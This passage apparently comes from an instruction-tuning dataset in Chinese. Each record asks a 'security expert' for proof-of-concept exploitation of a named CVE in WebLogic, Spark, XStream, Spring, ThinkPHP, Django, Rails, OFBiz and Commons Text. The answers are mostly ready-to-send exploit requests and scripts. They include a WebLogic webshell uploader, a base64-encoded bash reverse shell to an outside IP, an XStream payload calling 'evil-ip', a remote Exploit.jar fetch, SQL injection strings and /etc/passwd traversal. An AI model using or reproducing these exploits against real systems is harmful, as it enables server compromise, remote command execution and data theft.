;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x6f;&#x75;&#x74;&#x2e;&#x70;&#x72;&#x69;&#x6e;&#x74;&#x28;&#x22;&#x3c;&#x2f;&#x70;&#x72;&#x65;&#x3e;&#x22;&#x29;&#x3b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x25;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x62;&#x6f;&#x64;&#x79;&#x3e;&#x0a;&#x0a;&#x3c;&#x2f;&#x68;&#x74;&#x6d;&#x6c;&#x3e;</string>\n       </void>\n       <void method=\"close\"/>\n      </object>\n      </java>]]></string></void></class>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body></soapenv:Body></soapenv:Envelope>'''\n\turl=\"%s/wls-wsat/CoordinatorPortType\"%(ip)\n\trsp = requests.post(url, data=body, verify=False, headers=headers)\n\tlogger.info(\"\\r\\nShell地址: %s/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig\"%(ip))\n\n\n\nif __name__=='__main__':\n\tinfo='''命令执行:\n\tpython weblogic-2019-2725.py 10.3.6  http//:127.0.0.1:7001  cmd\n\tpython weblogic-2019-2725.py 12.1.3  http//:127.0.0.1:7001  cmd\n上传webshell\n    python weblogic-2019-2725.py  10.3.6  http//:ip:port\n    python weblogic-2019-2725.py  12.1.3  http//:ip:port\n\t'''\n\tprint(info)\n\tif len(sys.argv)==3:\n\t\tif sys.argv[1] ==\"10.3.6\":\n\t\t\twebshell_10_3_6(sys.argv[2])\n\t\telif sys.argv[1] ==\"12.1.3\":\n\t\t\twebshell_12_1_3(sys.argv[2])\n\t\telse:\n\t\t\tlogger.error(\"参数传入错误\")\n\telif len(sys.argv)==4:\n\t\tif sys.argv[1] ==\"10.3.6\":\n\t\t\tweblogic_10_3_6(sys.argv[2],sys.argv[3])\n\t\telif sys.argv[1] ==\"12.1.3\":\n\t\t\tweblogic_12_1_3(sys.argv[2],sys.argv[3])\n\t\telse:\n\t\t\tlogger.error(\"参数传入错误\")\t\t\n\telse:\n\t\tlogger.error(\"参数传入错误\")\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725.md"}
    1070. 

  1070. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Spark create 未授权访问漏洞\n漏洞描述:Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。\n影响版本:``` Apache Spark 3.1.2, 3.2.1, 3.3.0 ```\n网络测绘:``` app=\"APACHE-Spark-Jobs\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache Spark 3.1.2, 3.2.1, 3.3.0\n2. app=\"APACHE-Spark-Jobs\"\n3. POST /v1/submissions/create HTTP/1.1\nHost: your-ip:6066\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nContent-Type: application/json\nConnection: close\nContent-Length: 680\n\n{\n  \"action\": \"CreateSubmissionRequest\",\n  \"clientSparkVersion\": \"2.3.1\",\n  \"appArgs\": [\n    \"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf\"\n  ],\n  \"appResource\": \"https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar\",\n  \"environmentVariables\": {\n    \"SPARK_ENV_LOADED\": \"1\"\n  },\n  \"mainClass\": \"Exploit\",\n  \"sparkProperties\": {\n    \"spark.jars\": \"https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar\",\n    \"spark.driver.supervise\": \"false\",\n    \"spark.app.name\": \"Exploit\",\n    \"spark.eventLog.enabled\": \"true\",\n    \"spark.submit.deployMode\": \"cluster\",\n    \"spark.master\": \"spark://your-ip:6066\"\n  }\n}\n# https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar\n# Github代码为编译后的代码\nimport java.io.BufferedReader;\nimport java.io.InputStreamReader;\n\npublic class Exploit {\n  public static void main(String[] args) throws Exception {\n    String[] cmds = args[0].split(\",\");\n\n    for (String cmd : cmds) {\n      System.out.println(cmd);\n      System.out.println(executeCommand(cmd.trim()));\n      System.out.println(\"==============================================\");\n    }\n  }\n\n  // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/\n  private static String executeCommand(String command) {\n    StringBuilder output = new StringBuilder();\n\n    try {\n      Process p = Runtime.getRuntime().exec(command);\n      p.waitFor();\n      BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));\n\n      String line;\n      while ((line = reader.readLine()) != null) {\n        output.append(line).append(\"\\n\");\n      }\n    } catch (Exception e) {\n      e.printStackTrace();\n    }\n\n    return output.toString();\n  }\n}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Spark create 未授权访问漏洞.md"}
    1071. 

  1071. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 换行解析漏洞 CVE-2017-15715\n漏洞描述:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。\n影响版本:``` Apache HTTPd  2.4.0~2.4.29版本 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-15715\n【POC利用方法】\n1. Apache HTTPd  2.4.0~2.4.29版本\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/httpd/CVE-2017-15715\ndocker-compose up -d\n3. 访问 http://xxx.xxx.xxx.xxx:8080 正常即可\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache HTTPd 换行解析漏洞 CVE-2017-15715.md"}
    1072. 

  1072. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:XStream 反序列化命令执行漏洞 CVE-2021-29505\n漏洞描述:XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用`sun.rmi.registry.RegistryImpl_Stub`构造RMI请求,进而执行任意命令。 参考链接: - https://x-stream.github.io/CVE-2021-29505.html - https://paper.seebug.org/1543/\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-29505\n【POC利用方法】\n1. docker-compose up -d\n2. java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 \"touch /tmp/awesome_poc\"\n3. POST / HTTP/1.1\nHost: your-ip\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nConnection: close\nContent-Type: application/xml\nContent-Length: 3169\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>evil-ip</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>evil-ip</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/XStream 反序列化命令执行漏洞 CVE-2021-29505.md"}
    1073. 

  1073. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Cloud Function SpEL表达式命令注入 CVE-2022-22963\n漏洞描述:Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。 参考链接: - https://tanzu.vmware.com/security/cve-2022-22963 - https://mp.weixin.qq.com/s/onYJWIESgLaWS64lCgsKdw - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-22963\n【POC利用方法】\n1. docker-compose up -d\n2. POST /functionRouter HTTP/1.1\nHost: y:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/success\")\nContent-Type: text/plain\nContent-Length: 4\n\ntest\n3. Connection: close\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Cloud Function SpEL表达式命令注入 CVE-2022-22963.md"}
    1074. 

  1074. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Rails Accept 任意文件读取漏洞 CVE-2019-5418\n漏洞描述:Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当做外部模板来解析。\n影响版本:``` Rail <= 5.2.2.1 ```\n网络测绘:``` title=\"Ruby On Rails\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2019-5418\n【POC利用方法】\n1. Rail <= 5.2.2.1\n2. title=\"Ruby On Rails\"\n3. GET /robots HTTP/1.1\nHost: 127.0.0.1:3000\nAccept-Encoding: gzip, deflate\nAccept: ../../../../../../../../etc/passwd{{\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Rails Accept 任意文件读取漏洞 CVE-2019-5418.md"}
    1075. 

  1075. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OFBiz 反序列化 CVE-2021-30128\n漏洞描述:Ofbiz(Open for business)是一个开源的,基于J2EE和XML规范的,用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架(Framework)。 参考链接: - 阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w - r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A - https://github.com/r0ckysec/CVE-2021-30128 - https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A\n影响版本:``` Apache OFBiz < 17.12.07 ```\n网络测绘:``` app=\"Apache_OFBiz\" ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2021-30128\n【POC利用方法】\n1. Apache OFBiz < 17.12.07\n2. app=\"Apache_OFBiz\"\n3. POST /webtools/control/SOAPService HTTP/1.1\nHost: 192.168.80.145:8443\nUser-Agent: python-requests/2.24.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: close\nContent-Type: text/xml\nContent-Length: 6093\n\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">  \n  <soapenv:Header/>  \n  <soapenv:Body>\n    <ser>\n      <map-Map>\n        <map-Entry>\n          <map-Key> <cus-obj>ACED0005 ... ... 871007E000D78</cus-obj>\n          </map-Key>  \n          <map-Value>  \n            <std-String/>\n          </map-Value>\n        </map-Entry>\n      </map-Map>\n    </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md"}
    1076. 

  1076. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Messaging 远程命令执行漏洞 CVE-2018-1270\n漏洞描述:spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS, 在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用`StandardEvaluationContext`解析,造成命令执行漏洞。 参考链接: - https://pivotal.io/security/cve-2018-1270 - https://xz.aliyun.com/t/2252 - https://cert.360.cn/warning/detail?id=3efa573a1116c8e6eed3b47f78723f12 - https://github.com/CaledoniaProject/CVE-2018-1270\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2018-1270\n【POC利用方法】\n1. docker-compose up -d\n2. T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYxCgo=}|{base64,-d}|{bash,-i}'\n3. #!/usr/bin/env python3\nimport requests\nimport random\nimport string\nimport time\nimport threading\nimport logging\nimport sys\nimport json\n\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\ndef random_str(length):\n    letters = string.ascii_lowercase + string.digits\n    return ''.join(random.choice(letters) for c in range(length))\n\n\nclass SockJS(threading.Thread):\n    def __init__(self, url, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'\n        self.daemon = True\n        self.session = requests.session()\n        self.session.headers = {\n            'Referer': url,\n            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'\n        }\n        self.t = int(time.time()*1000)\n\n    def run(self):\n        url = f'{self.base}/htmlfile?c=_jp.vulhub'\n        response = self.session.get(url, stream=True)\n        for line in response.iter_lines():\n            time.sleep(0.5)\n    \n    def send(self, command, headers, body=''):\n        data = [command.upper(), '\\n']\n\n        data.append('\\n'.join([f'{k}:{v}' for k, v in headers.items()]))\n        \n        data.append('\\n\\n')\n        data.append(body)\n        data.append('\\x00')\n        data = json.dumps([''.join(data)])\n\n        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)\n        if response.status_code != 204:\n            logging.info(f\"send '{command}' data error.\")\n        else:\n            logging.info(f\"send '{command}' data success.\")\n\n    def __del__(self):\n        self.session.close()\n\n\nsockjs = SockJS('http://your-ip:8080/gs-guide-websocket')\nsockjs.start()\ntime.sleep(1)\n\nsockjs.send('connect', {\n    'accept-version': '1.1,1.0',\n    'heart-beat': '10000,10000'\n})\nsockjs.send('subscribe', {\n    'selector': \"T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')\",\n    'id': 'sub-0',\n    'destination': '/topic/greetings'\n})\n\ndata = json.dumps({'name': 'vulhub'})\nsockjs.send('send', {\n    'content-length': len(data),\n    'destination': '/app/hello'\n}, data)\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Messaging 远程命令执行漏洞 CVE-2018-1270.md"}
    1077. 

  1077. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Dubbo Java反序列化漏洞 CVE-2019-17564\n漏洞描述:Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。RPC,全称为Remote Procedure Call,即远程过程调用,它是一个计算机通信协议。它允许像调用本地服务一样调用远程服务。 Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的`org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter`类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 在Spring文档中,对`HttpInvokerServiceExporter`有如下描述,并不建议使用: > WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead. 参考链接: - https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.html - https://www.anquanke.com/post/id/198747 - https://paper.seebug.org/1128/\n影响版本:``` Apache Dubbo 2.7.4及以前版本 ``` Apache Dubbo 2.7.5后Dubbo使用`com.googlecode.jsonrpc4j.JsonRpcServer`替换了`HttpInvokerServiceExporter`。\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2019-17564\n【POC利用方法】\n1. Apache Dubbo 2.7.4及以前版本\n2. docker-compose up -d\n3. $ wget https://dlcdn.apache.org/zookeeper/zookeeper-3.7.0/apache-zookeeper-3.7.0-bin.tar.gz\n$ tar xvf apache-zookeeper-3.7.0-bin.tar.gz\n$ cd apache-zookeeper-3.7.0-bin/bin\n$ ./zkCli -server target-ip:2181\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Dubbo Java反序列化漏洞 CVE-2019-17564.md"}
    1078. 

  1078. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Django GIS SQL注入漏洞 CVE-2020-9402\n漏洞描述:Django在2020年3月4日发布了一个安全更新,修复了在GIS 查询功能中存在的SQL注入漏洞。 参考链接: - https://www.djangoproject.com/weblog/2020/mar/04/security-releases/ 该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2020-9402\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. http://your-ip:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1\n3. http://your-ip:8000/vuln2/?q=0.05)))%20FROM%20%22VULN_COLLECTION2%22%20%20where%20%20(select%20utl_inaddr.get_host_name((SELECT%20user%20FROM%20DUAL))%20from%20dual)%20is%20not%20null%20%20--\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Django GIS SQL注入漏洞 CVE-2020-9402.md"}
    1079. 

  1079. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Data Rest 远程命令执行漏洞CVE-2017-8046\n漏洞描述:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现[RFC6902](https://tools.ietf.org/html/rfc6902)),path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞。 参考链接: - [http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/](http://xxlegend.com/2017/09/29/Spring Data Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/) - [https://tech.meituan.com/Spring_Data_REST_远程代码执行漏洞%28CVE-2017-8046%29_分析与复现.html](https://tech.meituan.com/Spring_Data_REST_远程代码执行漏洞(CVE-2017-8046)_分析与复现.html)\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2017-8046\n【POC利用方法】\n1. docker-compose up -d\n2. # Payload to ASCII\npayload = b'touch /tmp/awesome_poc'\nbytecode = ','.join(str(i) for i in list(payload))\nprint(bytecode)\n3. 116,111,117,99,104,32,47,116,109,112,47,97,119,101,115,111,109,101,95,112,111,99\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Data Rest 远程命令执行漏洞 CVE-2017-8046.md"}
    1080. 

  1080. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞\n漏洞描述:ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 参考链接: - http://www.thinkphp.cn/topic/60400.html - http://www.thinkphp.cn/topic/60390.html - https://xz.aliyun.com/t/3570\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd\n3. http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/ThinkPHP5 5.0.22 5.1.29 远程代码执行漏洞.md"}
    1081. 

  1081. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Django QuerySet.order_by() SQL注入漏洞\n漏洞描述:Django在2021年7月1日发布了一个安全更新,修复了在QuerySet底下的order_by函数中存在的SQL注入漏洞 参考链接: - https://www.djangoproject.com/weblog/2021/jul/01/security-releases/ 该漏洞需要用户可控order_by传入的值,在预期列的位置注入SQL语句。\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. http://your-ip:8000/vuln/?order=-id\n3. http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Django QuerySet.order_by() SQL注入漏洞 CVE-2021-35042.md"}
    1082. 

  1082. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 CVE-2022-22947\n漏洞描述:Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 参考链接: - https://tanzu.vmware.com/security/cve-2022-22947 - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-22947\n【POC利用方法】\n1. docker-compose up -d\n2. POST /actuator/gateway/routes/hacktest HTTP/1.1\nHost: your-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/json\nContent-Length: 328\n\n{\n  \"id\": \"hacktest\",\n  \"filters\": [{\n    \"name\": \"AddResponseHeader\",\n    \"args\": {\"name\": \"Result\",\"value\": \"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"id\\\"}).getInputStream()))}\"}\n  }],\n\"uri\": \"http://example.com\",\n\"order\": 0\n}\n3. POST /actuator/gateway/refresh HTTP/1.1\nHost: your-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 CVE-2022-22947.md"}
    1083. 

  1083. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ThinkPHP 2.x 任意代码执行漏洞\n漏洞描述:ThinkPHP 2.x版本中,使用`preg_replace`的`/e`模式匹配路由: ```php $res = preg_replace('@(\\w+)'.$depr.'([^'.$depr.'\\/]+)@e', '$var[\\'\\\\1\\']=\"\\\\2\";', implode($depr,$paths)); ``` 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. $res = preg_replace('@(\\w+)'.$depr.'([^'.$depr.'\\/]+)@e', '$var[\\'\\\\1\\']=\"\\\\2\";', implode($depr,$paths));\n2. docker-compose up -d\n3. http://your-ip:8080/index.php?s=/index/index/name/$%7Bsystem(id)%7D\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/ThinkPHP 2.x 任意代码执行漏洞.md"}
    1084. 

  1084. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Commons Text 远程代码执行漏洞 CVE-2022-42889\n漏洞描述:Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。\n影响版本:``` 1.5.0 ≤ Apache Commons Text < 1.10.0 ```\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【CVE编号】CVE-2022-42889\n【POC利用方法】\n1. 1.5.0 ≤ Apache Commons Text < 1.10.0\n2. <dependencies>\n    <dependency>\n        <groupId>org.apache.commons</groupId>\n        <artifactId>commons-configuration2</artifactId>\n        <version>2.7</version>\n    </dependency>\n    <dependency>\n        <groupId>org.apache.commons</groupId>\n        <artifactId>commons-text</artifactId>\n        <version>1.9</version>\n    </dependency>\n    <dependency>\n        <groupId>org.apache.commons</groupId>\n        <artifactId>commons-lang3</artifactId>\n        <version>3.12.0</version>\n    </dependency>\n</dependencies>\n3. package org.text;\n\nimport org.apache.commons.text.StringSubstitutor;\n\npublic class Main {\n    public static void main(String[] args) {\n        StringSubstitutor interpolator = StringSubstitutor.createInterpolator();\n        // String payload = interpolator.replace(\"${script:js:new\n        // java.lang.ProcessBuilder(\\\"calc\\\").start()}\");\n        String payload = \"${script:js:new java.lang.ProcessBuilder(\\\"calc\\\").start()}\";\n        interpolator.replace(payload);\n    }\n}\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/Apache Commons Text 远程代码执行漏洞 CVE-2022-42889.md"}
    1085. 

  1085. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ThinkPHP5 5.0.23 远程代码执行漏洞\n漏洞描述:ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 参考链接: - https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003\n", "input": "", "output": "【漏洞类型】framework_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. POST /index.php?s=captcha HTTP/1.1\nHost: your-vps-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 72\n\n_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id\n3. _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id\n", "category": "poc_framework_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发框架漏洞/ThinkPHP5 5.0.23 远程代码执行漏洞.md"}
    1086. 

